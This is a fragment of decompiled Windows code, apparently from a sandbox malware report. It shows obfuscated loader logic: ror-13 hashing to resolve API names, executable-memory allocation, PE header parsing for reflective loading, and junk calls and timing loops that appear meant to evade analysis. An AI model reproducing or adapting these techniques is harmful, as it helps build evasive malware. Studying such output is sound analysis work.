						asm("movss xmm0, [0x6e9f9760]");
						asm("movss [ebp-0x80], xmm0");
						asm("movsd xmm0, [0x6e9f95f8]");
						asm("movsd [ebp-0x150], xmm0");
						asm("movss xmm0, [0x6e9f97ac]");
						asm("movss [ebp-0xf4], xmm0");
						asm("movss xmm0, [0x6e9f9708]");
						asm("movss [ebp-0xcc], xmm0");
						asm("movss xmm0, [0x6e9f9728]");
						asm("movss [ebp-0x5c], xmm0");
						asm("movss xmm0, [0x6e9f9768]");
						asm("movss [ebp-0xc8], xmm0");
						asm("movss xmm0, [0x6e9f95c8]");
						asm("movss [ebp-0x120], xmm0");
						asm("movss xmm0, [0x6e9f9750]");
						asm("movss [ebp-0x104], xmm0");
						asm("movss xmm0, [0x6e9f96f8]");
						asm("movss [ebp-0x128], xmm0");
						asm("movss xmm0, [0x6e9f9794]");
						asm("movss [ebp-0x12c], xmm0");
						asm("movsd xmm0, [0x6e9f9588]");
						asm("movsd [ebp-0x180], xmm0");
						asm("movss xmm0, [0x6e9f96b8]");
						asm("movss [ebp-0x130], xmm0");
						asm("movss xmm0, [0x6e9f9720]");
						asm("movss [ebp-0x78], xmm0");
						asm("movsd xmm0, [0x6e9f95d8]");
						asm("movsd [ebp-0xc0], xmm0");
						asm("movss xmm0, [0x6e9f96e4]");
						asm("movss [ebp-0x100], xmm0");
						asm("movsd xmm0, [0x6e9f95a8]");
						asm("movsd [ebp-0x188], xmm0");
						asm("movss xmm0, [0x6e9f96ac]");
						asm("movss [ebp-0x18], xmm0");
						asm("movss xmm0, [0x6e9f9748]");
						asm("movss [ebp-0x140], xmm0");
						asm("movsd xmm0, [0x6e9f9600]");
						asm("movsd [ebp-0x168], xmm0");
						asm("movss xmm0, [0x6e9f978c]");
						asm("movss [ebp-0x144], xmm0");
						asm("movsd xmm0, [0x6e9f9580]");
						asm("movsd [ebp-0xb4], xmm0");
						asm("movss xmm0, [0x6e9f9714]");
						asm("movss [ebp-0xfc], xmm0");
						asm("movss xmm0, [0x6e9f975c]");
						asm("movss [ebp-0x154], xmm0");
						asm("movss xmm0, [0x6e9f96b4]");
						asm("movss [ebp-0x54], xmm0");
						asm("movss xmm0, [0x6e9f9718]");
						asm("movss [ebp-0x158], xmm0");
						asm("movss xmm0, [0x6e9f9784]");
						_v244 = _v296;
						asm("movss [ebp-0x15c], xmm0");
						asm("movss xmm0, [0x6e9f9578]");
						_v160 = _v92;
						asm("movss [ebp-0x160], xmm0");
						asm("movss xmm0, [0x6e9f9710]");
						_v152 = _v76;
						_v100 = _v312;
						asm("movss [ebp-0x114], xmm0");
						while(_t843 != 0) {
							while(1) {
								_v104 = _t580;
								if(_t580 == 0) {
									break;
								}
								if(_t814 + 4 <= _v60) {
									asm("comiss xmm1, xmm2");
									if(__eflags < 0) {
										asm("pause");
										_t640 = E6E9E8E30(E6E9B5D90(), _t639);
										asm("movaps xmm1, xmm0");
										asm("xorps xmm2, xmm2");
										asm("mulsd xmm0, [ebp-0x150]");
										asm("mulsd xmm1, [ebp-0xd4]");
										asm("divsd xmm1, xmm0");
										asm("movss xmm0, [ebp-0xf4]");
										asm("cvtsd2ss xmm2, xmm1");
										asm("comiss xmm0, xmm2");
										asm("movss [ebp-0x1c], xmm2");
										asm("movss [ebp-0x24], xmm2");
										if(__eflags < 0) {
											goto L33;
										}
										goto L32;
									} else {
										GetCommandLineW();
										L32:
										_t661 = E6E9B5EE0(0x21, _t814);
										asm("cdq");
										_t640 = E6E9E8E30(E6E9E8160(_t661, _t814, 0x2c, 0), _t663);
										asm("xorps xmm2, xmm2");
										asm("cvtsd2ss xmm2, xmm0");
										asm("movss [ebp-0x1c], xmm2");
										asm("movss [ebp-0x24], xmm2");
										L33:
										asm("ucomiss xmm2, [ebp-0xcc]");
										asm("lahf");
										__eflags = _t640 & 0x00000044;
										if(__eflags == 0) {
											EmptyClipboard();
											asm("movss xmm2, [ebp-0xa4]");
											asm("movss [ebp-0x1c], xmm2");
											asm("movss [ebp-0x24], xmm2");
										}
										goto L35;
									}
								} else {
									_t814 = 0xd;
									_t665 = E6E9B8A10(_t868, 0xd, _t904);
									asm("movss xmm2, [ebp-0x1c]");
									_t868 = _t665;
									L35:
									_t802 =  *_t904;
									if(_t802 < 0x61) {
										_t838 = _v44;
										__eflags = _t838 - _v156;
										_t642 =  !=  ? _t838 : _v112;
										_v8 = 0xffffffff;
										_t814 =  !=  ? _t838 : _v112;
										_v44 = _t814;
										L39:
										_t868 = _t868 + (_t802 & 0x000000ff);
										if(_t814 == _v60) {
											asm("comiss xmm2, [ebp-0x120]");
											if(__eflags >= 0) {
												asm("movss xmm0, [ebp-0x5c]");
												E6E9B5C20(_t802, _t814);
												asm("cvttss2si esi, xmm0");
												asm("movss xmm0, [ebp-0x5c]");
												E6E9B5C20(_t802, _t814);
												asm("movd xmm1, esi");
												asm("cvtdq2ps xmm1, xmm1");
												asm("cvttss2si ecx, xmm0");
												asm("movss [ebp-0x30], xmm0");
												asm("movss [ebp-0x1c], xmm1");
												E6E9B5EE0(_t802, _t814);
												asm("movss xmm1, [ebp-0x30]");
												asm("movss xmm2, [ebp-0x1c]");
												_t904 = _v72;
												asm("movd xmm0, eax");
												asm("cvtdq2ps xmm0, xmm0");
												_t814 = _v44;
												asm("divss xmm1, xmm0");
												asm("subss xmm2, xmm1");
												asm("movss [ebp-0x1c], xmm2");
												asm("movss [ebp-0x24], xmm2");
											}
											asm("movss xmm1, [ebp-0x80]");
											_t580 = _v104 + 0xffff;
										} else {
											_t904 = _t904 + 1;
											asm("movss xmm1, [ebp-0x80]");
											_t580 = _v104 + 0xffff;
											_v72 = _t904;
										}
										continue;
									}
									asm("cdq");
									_t651 = _v44 - _t814 >> 1;
									if(_v44 - _t814 >> 1 < _v60) {
										asm("movss xmm1, [0x6e9f96f4]");
										asm("movsd xmm3, [0x6e9f95b8]");
										asm("movss xmm0, [0x6e9f9734]");
										asm("movss [ebp-0x4c], xmm1");
										asm("movsd xmm1, [0x6e9f9628]");
										asm("movsd [ebp-0x90], xmm1");
										asm("movss xmm1, [0x6e9f9764]");
										asm("movss [ebp-0x84], xmm1");
										asm("movss xmm1, [0x6e9f9564]");
										asm("movsd [ebp-0xc0], xmm3");
										asm("movss [ebp-0x80], xmm0");
										asm("movss [ebp-0x108], xmm1");
										while(1) {
											_t873 = 0;
											__eflags = 0;
											asm("movsd [ebp-0xac], xmm3");
											asm("comiss xmm0, xmm2");
											_t910 = 0x32;
											if(0 < 0) {
												goto L48;
											}
											_t839 = 0;
											_t806 = 0x32;
											E6E9E8E30(_t651, 0x32);
											asm("movsd xmm1, [ebp-0xac]");
											asm("movaps xmm2, xmm0");
											asm("movsd [ebp-0x150], xmm2");
											do {
												asm("cvtpd2ps xmm0, xmm1");
												_t654 = E6E9B5C20(_t806, _t839);
												_t839 = _t873;
												asm("movss [ebp-0x64], xmm0");
												_t655 = E6E9E8E30(_t654, _t910);
												asm("movss xmm2, [ebp-0x64]");
												asm("cvtsd2ss xmm0, xmm0");
												asm("movaps xmm1, xmm2");
												asm("subss xmm1, xmm0");
												asm("cvtps2pd xmm0, xmm2");
												asm("movss [ebp-0x30], xmm1");
												asm("movsd xmm1, [ebp-0xac]");
												asm("addsd xmm1, [ebp-0x150]");
												asm("divsd xmm0, xmm1");
												asm("movsd [ebp-0xac], xmm1");
												_t656 = E6E9E8CDF(_t655);
												_t910 = _t656;
												_t806 = _t656;
												E6E9E8E30(_t656, _t656);
												asm("movsd xmm1, [ebp-0xac]");
												asm("movaps xmm2, xmm0");
												asm("movss xmm0, [ebp-0x30]");
												asm("addss xmm0, [ebp-0x64]");
												asm("movsd [ebp-0x150], xmm2");
												asm("cvtps2pd xmm0, xmm0");
												asm("addsd xmm0, xmm1");
												asm("addsd xmm0, xmm2");
												asm("movss xmm2, [ebp-0x80]");
												asm("cvtpd2ps xmm0, xmm0");
												asm("comiss xmm2, xmm0");
											} while (__eflags >= 0);
											L48:
											asm("movss xmm0, [0x6e9f9730]");
											asm("movss [ebp-0x64], xmm0");
											do {
												__imp__GetCurrentProcessorNumber();
												asm("movss xmm0, [ebp-0x64]");
												_t652 = E6E9B5C20(_t802, _t814);
												asm("movss xmm1, [ebp-0x4c]");
												asm("cvtss2sd xmm0, xmm0");
												asm("cvtsd2ss xmm0, xmm0");
												asm("comiss xmm1, xmm0");
												asm("movss [ebp-0x64], xmm0");
											} while (__eflags > 0);
											asm("movss xmm2, [ebp-0xcc]");
											asm("movsd xmm1, [ebp-0x90]");
											asm("ucomiss xmm0, xmm2");
											asm("lahf");
											__eflags = _t652 & 0x00000044;
											if(__eflags != 0) {
												L52:
												asm("comiss xmm0, [ebp-0x84]");
												if(__eflags <= 0) {
													asm("movss xmm0, [0x6e9f9788]");
													_t651 = E6E9B5C20(_t802, _t814);
													asm("movss xmm2, [ebp-0x110]");
													asm("subss xmm2, xmm0");
												} else {
													_t802 = 1;
													_t659 = E6E9B5D90();
													asm("movss xmm2, [ebp-0x108]");
													_t651 = _t659;
													asm("movd xmm0, eax");
													asm("cvtdq2ps xmm0, xmm0");
													asm("divss xmm2, xmm0");
													asm("subss xmm2, [0x6e9f97b4]");
												}
												asm("comiss xmm2, [ebp-0x5c]");
												asm("movss xmm0, [ebp-0x80]");
												asm("movsd xmm3, [ebp-0xc0]");
												if(__eflags > 0) {
													asm("movss xmm0, [ebp-0xc8]");
													_t658 = E6E9B5C20(_t802, _t814);
													asm("cvttss2si eax, xmm0");
													asm("movsd xmm3, [ebp-0xc0]");
													_t651 = _t658 * 0xffffffe8;
													asm("movd xmm0, eax");
													asm("cvtdq2pd xmm0, xmm0");
													asm("cvtpd2ps xmm2, xmm0");
													asm("movss xmm0, [ebp-0x80]");
												}
												continue;
											} else {
												goto L51;
											}
											do {
												L51:
												asm("movaps xmm0, xmm1");
												asm("mulsd xmm1, xmm0");
												asm("xorps xmm0, xmm0");
												asm("cvtsd2ss xmm0, xmm1");
												asm("ucomiss xmm0, xmm2");
												asm("lahf");
												__eflags = _t652 & 0x00000044;
											} while (__eflags != 0);
											goto L52;
										}
									} else {
										_t814 = _v44;
										_t868 = _t868 + 0xffffffe0;
										goto L39;
									}
								}
							}
							_t905 = _v60;
							__eflags = _t868 - 0x6a4abc5b;
							if(_t868 != 0x6a4abc5b) {
								L112:
								__eflags = _v236;
								if(__eflags == 0) {
									L126:
									_t843 =  *_v68;
									_v68 = _t843;
									continue;
								}
								__eflags = _v200;
								if(__eflags == 0) {
									goto L126;
								}
								__eflags = _v128;
								if(__eflags == 0) {
									goto L126;
								}
								__eflags = _t814 - _t905;
								if(__eflags > 0) {
									_t814 = 0x91afca54;
									E6E9B8A50(0x91afca54);
									_t772 =  *((intOrPtr*)(_v36 + 0x50)) + 0xc;
									__eflags = _t772;
									_t582 = VirtualAlloc(0, _t772, 0x3000, 0x40); // executed
									_v48 = _t582;
									break;
								}
								asm("movss xmm0, [ebp-0x1c]");
								asm("o16 nop [eax+eax]");
								L117:
								asm("comiss xmm0, [0x6e9f9798]");
								if(__eflags > 0) {
									_t580 = E6E9E8E30(_t580, 0x32);
									asm("cvtsd2ss xmm0, xmm0");
								}
								goto L117;
							}
							__eflags = _t814 - _t905;
							if(_t814 <= _t905) {
								__eflags = _v120;
								if(_v120 <= 0) {
									goto L112;
								}
								_t583 = _v160;
								_t774 = _v152;
								_t906 = _v48;
								while(1) {
									L63:
									_v92 = _t583;
									_t870 = _t774;
									_v76 = _t870;
									_t775 =  *_t583 + _t906;
									_t907 = 0;
									__eflags = 0;
									_t585 =  *_t775;
									do {
										L64:
										asm("ror esi, 0xd");
										_t775 = _t775 + 1;
										_t907 = _t907 + _t585;
										_t585 =  *_t775;
										__eflags = _t585;
									} while (_t585 != 0);
									_v52 = _t907;
									__eflags = _t907 - 0xec0e4e8e;
									if(_t907 == 0xec0e4e8e) {
										L68:
										_t776 = _v60;
										_t871 = _t814;
										__eflags = _t814 - _t776;
										if(_t814 <= _t776) {
											L84:
											_t872 = _v48;
											_t777 = _v100;
											L85:
											__eflags = _t907 - 0xec0e4e8e;
											if(_t907 != 0xec0e4e8e) {
												__eflags = _t907 - 0x7c0dfcaa;
												if(_t907 != 0x7c0dfcaa) {
													__eflags = _t907 - 0x91afca54;
													if(_t907 == 0x91afca54) {
														__eflags = _t814 - _v60;
														if(_t814 > _v60) {
															_t589 =  *_t777 + _t872;
															__eflags = _t589;
															_v128 = _t589;
															_v284 = _t589;
														}
													}
													L109:
													_t194 =  &_v120;
													 *_t194 = _v120 + 0xffff;
													__eflags =  *_t194;
													_t814 = _v44;
													_t870 = _v76;
													L110:
													__eflags = _t814 - _v288;
													_t774 =  <=  ? _t870 :  &(_t870[1]);
													_v152 = _t774;
													_t583 =  <=  ? _v92 : _v92 + 4;
													__eflags = _v120;
													_t906 = _v48;
													if(_v120 > 0) {
														asm("movss xmm2, [ebp-0x1c]");
														L63:
														_v92 = _t583;
														_t870 = _t774;
														_v76 = _t870;
														_t775 =  *_t583 + _t906;
														_t907 = 0;
														__eflags = 0;
														_t585 =  *_t775;
														goto L64;
													}
													_t905 = _v60;
													_v160 = _t583;
													_v92 = _t583;
													_v152 = _t774;
													_v76 = _t774;
													goto L112;
												}
												asm("cdq");
												_t592 = _t814 - _t814 >> 1;
												__eflags = _t592 - _v60;
												if(__eflags < 0) {
													asm("comiss xmm2, [ebp-0x100]");
													asm("movsd xmm1, [ebp-0xc0]");
													asm("movsd [ebp-0x34], xmm1");
													if(__eflags < 0) {
														L95:
														asm("movss xmm0, [ebp-0xc8]");
														asm("comiss xmm0, xmm2");
														if(__eflags >= 0) {
															GetSystemDefaultLangID();
															asm("movss xmm0, [ebp-0x18]");
															E6E9B5C20(_t777, _t814);
															asm("xorps xmm1, xmm1");
															asm("cvtss2sd xmm1, xmm0");
															asm("movsd [ebp-0x34], xmm1");
															_t608 = E6E9E8E30(E6E9B5D90(), _t607);
															asm("movsd [ebp-0x50], xmm0");
															_t609 = E6E9E8CDF(_t608);
															_push(_t814);
															_push(_t609);
															E6E9B5A30();
															asm("movsd xmm1, [ebp-0x34]");
															_t914 = _t914 + 8;
															asm("divsd xmm1, [ebp-0x50]");
															_t814 = 0;
															_t777 = 0xc4;
															asm("cvttsd2si eax, xmm0");
															asm("movd xmm0, eax");
															asm("cvtdq2pd xmm0, xmm0");
															asm("divsd xmm1, xmm0");
															asm("movsd [ebp-0x34], xmm1");
															_t592 = E6E9E8E30(_t609, 0xc4);
															asm("movsd xmm1, [ebp-0x34]");
															asm("addsd xmm1, xmm0");
															asm("cvtpd2ps xmm2, xmm1");
														}
														asm("ucomiss xmm2, [ebp-0xa0]");
														asm("lahf");
														__eflags = _t592 & 0x00000044;
														if((_t592 & 0x00000044) == 0) {
															asm("movss xmm0, [ebp-0x140]");
															E6E9B5C20(_t777, _t814);
															asm("cvtss2sd xmm0, xmm0");
															asm("movsd [ebp-0x50], xmm0");
															asm("mulsd xmm0, [ebp-0x168]");
															asm("cvttsd2si esi, xmm0");
															E6E9E8E30(E6E9B5EE0(0x71, _t814), _t603);
															asm("cvtsd2ss xmm0, xmm0");
															asm("movss [ebp-0x30], xmm0");
															asm("movss xmm0, [ebp-0x144]");
															_t592 = E6E9B5C20(_t603, _t814);
															asm("movsd xmm1, [ebp-0x50]");
															asm("cvttss2si eax, xmm0");
															asm("xorps xmm0, xmm0");
															asm("cvtsi2sd xmm0, esi");
															asm("divsd xmm1, xmm0");
															asm("movss xmm0, [ebp-0x30]");
															asm("cvtps2pd xmm0, xmm0");
															asm("divsd xmm1, xmm0");
															asm("xorps xmm0, xmm0");
															asm("cvtsi2sd xmm0, eax");
															asm("addsd xmm1, xmm0");
															asm("cvtpd2ps xmm2, xmm1");
														}
														asm("ucomiss xmm2, [ebp-0xfc]");
														asm("movsd xmm3, [ebp-0xb4]");
														asm("lahf");
														__eflags = _t592 & 0x00000044;
														if(__eflags != 0) {
															L101:
															asm("movss xmm0, [ebp-0x154]");
															asm("comiss xmm0, xmm2");
															if(__eflags < 0) {
																E6E9E8E30(E6E9B5D90(), _t593);
																asm("xorps xmm1, xmm1");
																asm("cvtsd2ss xmm1, xmm0");
																asm("movss xmm0, [ebp-0x158]");
																asm("divss xmm0, xmm1");
																asm("movss [ebp-0x1c], xmm1");
																asm("movss [ebp-0x30], xmm0");
																_t595 = E6E9B5D90();
																asm("movss xmm0, [ebp-0x15c]");
																asm("divss xmm0, [ebp-0x30]");
																_t596 = _t595;
																asm("movss xmm1, [ebp-0x1c]");
																asm("subss xmm1, xmm0");
																asm("movd xmm0, eax");
																asm("cvtdq2ps xmm0, xmm0");
																asm("addss xmm1, xmm0");
															} else {
																_t601 = E6E9B5EE0(0x33, _t814);
																asm("movss xmm1, [ebp-0x54]");
																_t596 = _t601;
																asm("movd xmm0, eax");
																asm("cvtdq2ps xmm0, xmm0");
																asm("divss xmm1, xmm0");
																asm("addss xmm1, [ebp-0x110]");
															}
															asm("ucomiss xmm1, [ebp-0x160]");
															asm("movss [ebp-0x24], xmm1");
															asm("movss [ebp-0x1c], xmm1");
															asm("lahf");
															__eflags = _t596 & 0x00000044;
															if((_t596 & 0x00000044) == 0) {
																E6E9E8E30(_t596, 0x12);
																asm("cvtsd2ss xmm0, xmm0");
																asm("addss xmm0, [ebp-0x114]");
																asm("movss [ebp-0x4c], xmm0");
																_v52 = E6E9B5EE0(0x47, 0);
																E6E9E8E30(E6E9B5EE0(_t598, 0), _t599);
																asm("movd xmm1, dword [ebp-0x30]");
																asm("cvtdq2ps xmm1, xmm1");
																asm("cvtsd2ss xmm0, xmm0");
																asm("addss xmm1, [ebp-0x4c]");
																asm("addss xmm1, xmm0");
																asm("movss [ebp-0x1c], xmm1");
																asm("movss [ebp-0x24], xmm1");
															}
															goto L109;
														} else {
															do {
																asm("movaps xmm0, xmm3");
																_t592 = E6E9E8CDF(_t592);
																_push(_t814);
																_push(_t592);
																E6E9B5A30();
																asm("movaps xmm3, xmm0");
																asm("xorps xmm2, xmm2");
																asm("mulsd xmm0, xmm3");
																asm("movaps xmm1, xmm3");
																_t914 = _t914 + 8;
																asm("cvttsd2si eax, xmm0");
																asm("movd xmm0, eax");
																asm("cvtdq2pd xmm0, xmm0");
																asm("subsd xmm1, xmm0");
																asm("cvtsd2ss xmm2, xmm1");
																asm("ucomiss xmm2, [ebp-0xfc]");
																asm("lahf");
																__eflags = _t592 & 0x00000044;
															} while (__eflags != 0);
															goto L101;
														}
													}
													asm("movss xmm0, [ebp-0x104]");
													asm("movss [ebp-0x64], xmm0");
													asm("movsd xmm0, [ebp-0x188]");
													asm("movsd [ebp-0x50], xmm0");
													do {
														EmptyClipboard();
														asm("movss xmm0, [ebp-0x64]");
														E6E9B5C20(_t777, _t814);
														asm("cvttsd2si ecx, [ebp-0x34]");
														asm("movss [ebp-0x9c], xmm0");
														asm("movsd xmm0, [ebp-0x34]");
														asm("addsd xmm0, [ebp-0x50]");
														asm("cvttsd2si esi, xmm0");
														_t777 = E6E9B5D90();
														E6E9E8E30(_t612, _t612);
														asm("movsd [ebp-0x34], xmm0");
														asm("movss xmm0, [ebp-0x9c]");
														_t592 = E6E9B5C20(_t612, _t814);
														asm("movd xmm1, esi");
														asm("cvttss2si eax, xmm0");
														asm("movss xmm0, [ebp-0x9c]");
														asm("cvtdq2ps xmm1, xmm1");
														asm("movd xmm2, eax");
														asm("subss xmm0, xmm1");
														asm("movss [ebp-0x64], xmm1");
														asm("cvtdq2pd xmm2, xmm2");
														asm("cvtps2pd xmm0, xmm0");
														asm("movsd [ebp-0x50], xmm2");
														asm("addsd xmm0, [ebp-0x34]");
														asm("addsd xmm0, xmm2");
														asm("cvtpd2ps xmm2, xmm0");
														asm("comiss xmm2, [ebp-0x100]");
													} while (__eflags >= 0);
													goto L95;
												}
												_t615 =  *_t777 + _t872;
												_v200 = _t615;
												_v320 = _t615;
												goto L109;
											}
											__eflags = _t814 - _v60;
											if(_t814 > _v60) {
												_t617 =  *_t777 + _t872;
												_v236 = _t617;
												_v316 = _t617;
											}
											goto L109;
										}
										_t618 = _t814 + _t814;
										_v136 = _t618;
										while(1) {
											_v80 = _t871;
											__eflags = _t618 - _t776;
											if(_t618 >= _t776) {
												break;
											}
											asm("ucomiss xmm2, [ebp-0x104]");
											asm("lahf");
											__eflags = _t618 & 0x00000044;
											if(__eflags == 0) {
												_t632 = TlsAlloc();
												_t814 = 0;
												__eflags = 0;
												E6E9E8E30(_t632, 0x126);
												asm("cvtsd2ss xmm0, xmm0");
												asm("cvttss2si ecx, xmm0");
												E6E9B5D90();
											}
											asm("movss xmm1, [ebp-0x128]");
											do {
												asm("movd xmm0, eax");
												_t623 = 1;
												asm("cvtdq2ps xmm0, xmm0");
												asm("divss xmm1, xmm0");
												asm("comiss xmm1, [ebp-0x12c]");
											} while (__eflags >= 0);
											asm("ucomiss xmm1, [ebp-0xf4]");
											asm("lahf");
											__eflags = 0;
											if(0 != 0) {
												E6E9E8E30(E6E9B5EE0(4, _t814), _t624);
												asm("movsd [ebp-0x68], xmm0");
												asm("cvtsd2ss xmm0, xmm0");
												_t626 = E6E9B5C20(_t624, _t814);
												asm("cvttss2si eax, xmm0");
												asm("movsd xmm0, [ebp-0x180]");
												_t623 = _t626;
												asm("movd xmm1, eax");
												asm("cvtdq2pd xmm1, xmm1");
												asm("mulsd xmm1, [ebp-0x68]");
												asm("subsd xmm0, xmm1");
											} else {
												asm("movsd xmm0, [ebp-0xd4]");
												asm("divsd xmm0, xmm0");
											}
											asm("cvtpd2ps xmm2, xmm0");
											asm("movss xmm0, [ebp-0x130]");
											asm("ucomiss xmm2, [ebp-0x78]");
											asm("movss [ebp-0x44], xmm0");
											asm("movss xmm0, [ebp-0xf8]");
											asm("lahf");
											asm("movss [ebp-0x24], xmm2");
											asm("movss [ebp-0x1c], xmm2");
											asm("movss [ebp-0x64], xmm0");
											__eflags = _t623 & 0x00000044;
											if((_t623 & 0x00000044) != 0) {
												L82:
												_t871 = _t871 + 1;
												__eflags = _v80 - _v112;
												_t618 = _v136;
												_t776 = _v60;
												if(_v80 >= _v112) {
													continue;
												}
												_t814 = _v44;
												goto L84;
											} else {
												_t909 = __imp__CoFreeUnusedLibraries;
												do {
													_t628 =  *_t909();
													asm("movss xmm0, [ebp-0x64]");
													asm("divss xmm0, [ebp-0x44]");
													E6E9E8E30(E6E9E8AFE(_t628), _t629);
													asm("movss xmm1, [ebp-0x44]");
													asm("cvtsd2ss xmm0, xmm0");
													asm("addss xmm1, xmm0");
													asm("movss [ebp-0x1c], xmm0");
													asm("movaps xmm0, xmm1");
													asm("movss [ebp-0x44], xmm1");
													_t631 = E6E9B5C20(_t629, _t814);
													asm("movss xmm2, [ebp-0x1c]");
													asm("subss xmm2, [ebp-0x44]");
													asm("movss [ebp-0x64], xmm0");
													asm("addss xmm2, xmm0");
													asm("ucomiss xmm2, [ebp-0x78]");
													asm("movss [ebp-0x1c], xmm2");
													asm("movss [ebp-0x24], xmm2");
													asm("lahf");
													__eflags = _t631 & 0x00000044;
												} while ((_t631 & 0x00000044) != 0);
												_t907 = _v52;
												goto L82;
											}
										}
										_t872 = _v48;
										_t814 = _v44;
										_t777 =  *((intOrPtr*)(_v244 + 0x1c)) + ( *_v152 & 0x0000ffff) * 4 + _t872;
										_v100 = _t777;
										_v312 = _t777;
										goto L85;
									}
									__eflags = _t907 - 0x7c0dfcaa;
									if(_t907 == 0x7c0dfcaa) {
										goto L68;
									}
									__eflags = _t907 - 0x91afca54;
									if(_t907 != 0x91afca54) {
										goto L110;
									}
									goto L68;
								}
							}
							_v120 = 3;
							_t906 =  *(_v68 + 0x10);
							_v48 = _t906;
							_v240 = _t906;
							_t797 =  *((intOrPtr*)( *((intOrPtr*)(_t906 + 0x3c)) + _t906 + 0x78));
							_t798 = _t797 + _t906;
							_v244 = _t798;
							_t583 =  *((intOrPtr*)(_t797 + _t906 + 0x20)) + _t906;
							_v296 = _t798;
							_t774 =  *((intOrPtr*)(_t798 + 0x24)) + _t906;
							_v152 = _t774;
							goto L63;
						}
						_t879 = 1;
						do {
							__imp__GetTickCount64();
							asm("movsd xmm1, [ebp-0x178]");
							_t879 = _t879 + 1;
							__eflags = _t879;
							asm("movd xmm0, esi");
							asm("cvtdq2pd xmm0, xmm0");
							asm("comisd xmm1, xmm0");
						} while (_t879 >= 0);
						asm("movsd xmm0, [0x6e9f97c0]");
						asm("movsd [ebp-0x90], xmm0");
						asm("movsd xmm0, [0x6e9f9648]");
						asm("movsd [ebp-0xb4], xmm0");
						asm("movss xmm0, [ebp-0x1c]");
						while(1) {
							_t691 = _v44;
							asm("movss xmm1, [0x6e9f977c]");
							asm("cdq");
							_t815 = _v60;
							_t453 = _t691 - _t814 >> 1;
							_v52 = _t453;
							__eflags = _t453 - _t815;
							if(__eflags >= 0) {
								break;
							}
							asm("comiss xmm1, xmm0");
							if(__eflags < 0) {
								_t559 = E6E9E8E30(AreFileApisANSI(), 0x64);
								asm("cvtsd2ss xmm0, xmm0");
								asm("divss xmm0, [ebp-0x78]");
								_t560 = E6E9E8AFE(_t559);
								_t562 = E6E9E8E30(E6E9B5D90(), _t561);
								asm("movsd [ebp-0xe4], xmm0");
								_t563 = E6E9E8E30(_t562, _t560);
								asm("movss xmm1, [ebp-0x78]");
								asm("cvtsd2ss xmm0, xmm0");
								asm("divss xmm1, xmm0");
								asm("movaps xmm0, xmm1");
								_t565 = E6E9E8E30(E6E9E8AFE(_t563), _t564);
								asm("movsd xmm2, [ebp-0xe4]");
								asm("movaps xmm1, xmm0");
								asm("movaps xmm0, xmm2");
								_t814 = 0;
								asm("divsd xmm0, xmm1");
								asm("mulsd xmm2, xmm1");
								asm("cvtpd2ps xmm0, xmm0");
								asm("cvtps2pd xmm0, xmm0");
								asm("mulsd xmm0, xmm2");
								asm("movsd [ebp-0xe4], xmm0");
								E6E9E8E30(_t565, _t560);
								asm("movsd xmm1, [ebp-0xe4]");
								asm("addsd xmm1, xmm0");
								asm("cvtpd2ps xmm0, xmm1");
							} else {
								_t568 = E6E9E8E30(TlsAlloc(), 0x48);
								asm("divsd xmm0, [ebp-0x90]");
								_t569 = E6E9E8CDF(_t568);
								asm("sbb eax, edx");
								_t814 = 0;
								E6E9E8E30(0, 0xc8 - _t569);
								asm("movsd [ebp-0xe4], xmm0");
								E6E9E8E30(E6E9B5D90(), _t572);
								asm("movsd xmm1, [ebp-0xe4]");
								asm("subsd xmm1, xmm0");
								asm("subsd xmm1, [ebp-0xb4]");
								asm("cvtpd2ps xmm0, xmm1");
							}
						}
						_t844 = _v188;
						asm("movss [ebp-0x1c], xmm0");
						_t455 =  *((intOrPtr*)(_t844 + 0x3c)) + _t844;
						_v96 = _t455;
						_t880 =  *(_t455 + 0x54);
						_t456 = _v48;
						_v36 = _t456;
						__eflags = _t880;
						if(_t880 == 0) {
							L132:
							asm("movsd xmm0, [0x6e9f96c0]");
							_t881 = 1;
							asm("movsd [ebp-0x10c], xmm0");
							do {
								__imp__GetTickCount64();
								asm("movsd xmm1, [ebp-0x10c]");
								_t881 = _t881 + 1;
								__eflags = _t881;
								asm("movd xmm0, esi");
								asm("cvtdq2pd xmm0, xmm0");
								asm("comisd xmm1, xmm0");
							} while (_t881 >= 0);
							_t882 = __imp__GetThreadErrorMode;
							asm("movss xmm1, [0x6e9f9758]");
							asm("movss xmm0, [ebp-0x1c]");
							_t845 = _v52;
							while(1) {
								L135:
								asm("movss xmm2, [0x6e9f9740]");
								while(1) {
									__eflags = _t845 - _v60;
									if(_t845 >= _v60) {
										break;
									}
									asm("ucomiss xmm0, xmm1");
									asm("movss [ebp-0x7c], xmm2");
									asm("lahf");
									__eflags = _t456 & 0x00000044;
									if((_t456 & 0x00000044) != 0) {
										continue;
									} else {
										goto L138;
									}
									do {
										L138:
										 *_t882();
										asm("movss xmm0, [ebp-0x7c]");
										_t557 = E6E9B5C20(_t691, _t815);
										asm("movss xmm2, [ebp-0x7c]");
										asm("movaps xmm1, xmm0");
										asm("divss xmm2, xmm2");
										asm("mulss xmm1, xmm0");
										asm("movss [ebp-0x7c], xmm2");
										asm("cvttss2si eax, xmm1");
										_t456 = _t557;
										asm("movd xmm1, eax");
										asm("cvtdq2ps xmm1, xmm1");
										asm("mulss xmm1, xmm2");
										asm("subss xmm0, xmm1");
										asm("movss xmm1, [0x6e9f9758]");
										asm("ucomiss xmm0, xmm1");
										asm("movss [ebp-0x1c], xmm0");
										asm("lahf");
										__eflags = _t456 & 0x00000044;
									} while ((_t456 & 0x00000044) != 0);
									goto L135;
								}
								__imp__GetTickCount64();
								__imp__GetTickCount64();
								_v80 = _t456;
								_v52 = _t815;
								E6E9E8DF0(E6E9E81A0(_t456, _t815, 0x2710, 0), _t457, _t815);
								asm("mulsd xmm0, [ebp-0x170]");
								asm("movsd [ebp-0x88], xmm0");
								E6E9E8DF0(E6E9E81A0(_v80, _v52, 0x2710, 0), _t459, _t815);
								asm("mulsd xmm0, [ebp-0xdc]");
								_t461 = _v96;
								asm("movsd xmm1, [ebp-0x88]");
								asm("addsd xmm1, xmm0");
								_t848 = ( *(_t461 + 0x14) & 0x0000ffff) + _t461;
								_t462 =  *(_t461 + 6) & 0x0000ffff;
								asm("mulsd xmm1, [ebp-0xac]");
								asm("divsd xmm1, [0x6e9f9590]");
								asm("movsd [ebp-0x88], xmm1");
								__eflags = _t462;
								if(_t462 == 0) {
									L154:
									asm("movsd xmm0, [0x6e9f9570]");
									_t884 = 1;
									asm("movsd [ebp-0x50], xmm0");
									asm("movsd [ebp-0x34], xmm0");
									asm("movsd xmm0, [0x6e9f9568]");
									asm("movsd [ebp-0xdc], xmm0");
									asm("movsd xmm0, [0x6e9f9550]");
									asm("movsd [ebp-0x90], xmm0");
									do {
